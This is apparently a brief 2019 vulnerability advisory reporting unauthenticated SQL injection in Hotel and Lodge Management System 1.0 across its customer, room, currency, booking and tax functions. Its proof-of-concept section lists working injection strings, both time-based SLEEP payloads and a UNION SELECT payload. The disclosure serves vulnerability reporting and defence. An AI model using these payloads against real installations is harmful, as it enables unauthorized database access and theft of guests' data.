Hotel and Lodge Management System 1.0 SQLi

Disclosure date: 10/23/19


Hotel and Lodge Management System is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the Customer, Room, Currency, Room Booking Details, and Tax Details, functions.

Proof of Concept:' AND SLEEP(5)-- KAsX' AND SLEEP(5)-- vAKj' UNION ALL SELECT 9678,CONCAT(0x716a766b71,0x415a5770735a5043434749544b436b4a76686e7665576a446d72437a594969414c4349517655476b,0x7162767871),9678-- EVUO' AND SLEEP(5)-- hHTj' AND SLEEP(5)-- RLDn